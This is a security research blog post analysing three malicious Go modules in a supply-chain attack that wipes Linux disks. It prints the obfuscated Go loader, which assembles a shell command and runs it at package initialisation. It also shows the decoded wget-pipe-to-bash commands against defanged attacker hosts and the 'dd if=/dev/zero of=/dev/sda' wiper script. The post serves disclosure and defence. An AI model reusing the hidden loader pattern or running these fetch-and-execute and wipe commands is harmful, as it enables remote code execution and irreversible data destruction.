Kush Pandya
May 1, 2025
A single line of obfuscated Go code wiped entire disks clean. Could your project be next?
Socket’s Threat Research Team uncovered a stealthy and highly destructive supply-chain attack targeting developers using Go modules. Attackers leveraged obfuscation to deliver a catastrophic disk-wiper payload.
The Go ecosystem, valued for its simplicity, transparency, and flexibility, has exploded in popularity. With over 2 million modules available, developers rely heavily on public repositories like GitHub. However, this openness is precisely what attackers exploit.
In April 2025, we detected an attack involving three malicious Go modules which employ similar obfuscation techniques:
github[.]com/truthfulpharm/prototransformgithub[.]com/blankloggia/go-mcpgithub[.]com/steelpoor/tlsproxyDespite appearing legitimate, these modules contained highly obfuscated code designed to fetch and execute remote payloads. Socket’s scanners flagged the suspicious behaviors, leading us to a deeper investigation.
Socket scanner alerting malicious Go modules leveraging obfuscation
Unlike centralized package managers such as npm or PyPI, the Go ecosystem's decentralized nature where modules are directly imported from GitHub repositories creates substantial confusion. Developers often encounter multiple similarly named modules with entirely different maintainers, as shown below. This ambiguity makes it exceptionally challenging to identify legitimate packages from malicious impostors, even when packages aren't strictly "typosquatted." Attackers exploit this confusion, carefully crafting their malicious module namespaces to appear trustworthy at a glance, significantly increasing the likelihood developers inadvertently integrate destructive code into their projects.
Multiple similarly named Go modules creating namespace confusion, highlighting the difficulty of selecting trusted dependencies
Attackers cleverly masked their intent through array-based string obfuscation and dynamic payload execution—a method we previously explored in our "Obfuscation 101" blog. Here’s how one malicious module (truthfulpharm/prototransform) executed this trick:
func eGtROk() error {
DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
pBRPhsxN := runtime.GOOS == "linux"
bcbGOM := "/bin/sh"
vpqIU := "-c"
PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]
if pBRPhsxN {
exec.Command(bcbGOM, vpqIU, PWcf).Start()
}
return nil
}
var GEeEQNj = eGtROk()
Note: The payload specifically targets Linux systems, checking the OS before execution, ensuring that the attack impacts primarily Linux-based servers or developer environments.
Decoded Malicious Commands:
# prototransform module payload
wget -O - <https://vanartest>[.]website/storage/de373d0df/a31546bf | /bin/bash &
# go-mcp module payload
wget -O - <https://kaspamirror>[.]icu/storage/de373d0df/a31546bf | /bin/bash &
# tlsproxy module payload
wget -O - <http://147.45.44>[.]41/storage/de373d0df/ccd7b46d | /bin/sh &
Decoded Intent:
done.sh) from the attacker-controlled URL:Similar URLs extracted from the other malicious modules (now offline):
This isn't the first time we've observed malicious Go modules employing similar obfuscation techniques. Check out our previous research: "Typosquatted Go Packages Deliver Malware Loader"
Upon executing the payload retrieved from one of these URLs, we discovered a devastating shell script:
done.sh – The destructive payload:
#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
syncWhat does this payload actually do?
The command above executes dd, a powerful Unix utility, instructing it to copy zeros (/dev/zero) directly onto the primary storage device (/dev/sda). Here's why that's catastrophic:
/dev/sda (the primary disk) typically represents the primary storage device of a Linux system. This is usually where the operating system, user files, databases, configurations, and critical system data reside.This destructive method ensures no data recovery tool or forensic process can restore the data, as it directly and irreversibly overwrites it.
This malicious script leaves targeted Linux servers or developer environments entirely crippled, highlighting the extreme danger posed by modern supply-chain attacks that can turn seemingly trusted code into devastating threats.
Even minimal exposure to these modules could result in:
The extreme nature of this attack underscores the critical importance of proactive, layered defenses within software supply chains.
The discovery of the malicious Go modules (prototransform, go-mcp, and tlsproxy) highlights the persistent and evolving threats within open source ecosystems. Attackers exploit confusion around namespace validity and developers’ implicit trust in publicly sourced code, positioning themselves to execute destructive payloads that can irreversibly damage organizational infrastructure.
Secure software development practices must evolve to address these sophisticated threats. Proactive code audits, automated dependency analysis, and continuous runtime monitoring must become integral to the software development lifecycle, particularly for projects heavily reliant on external open source dependencies.
Socket's security suite—our free GitHub app, CLI tool, and browser extension—provides real-time threat detection and prevention. When integrated into development processes, these tools proactively block malicious packages, ensuring vulnerabilities are mitigated before they reach production environments.
Continuous vigilance, robust dependency management, and proactive security integration remain essential to safeguarding software supply chains against future threats.
github[.]com/truthfulpharm/prototransformgithub[.]com/blankloggia/go-mcpgithub[.]com/steelpoor/tlsproxySubscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
/Security News
A malicious Chrome extension posing as an Ethereum wallet steals seed phrases by encoding them into Sui transactions, enabling full wallet takeover.
Research
/Security News
Socket researchers discovered nine malicious NuGet packages that use time-delayed payloads to crash applications and corrupt industrial control systems.
Research
/Security News
Socket researchers found 10 typosquatted npm packages that auto-run on install, show fake CAPTCHAs, fingerprint by IP, and deploy a credential stealer.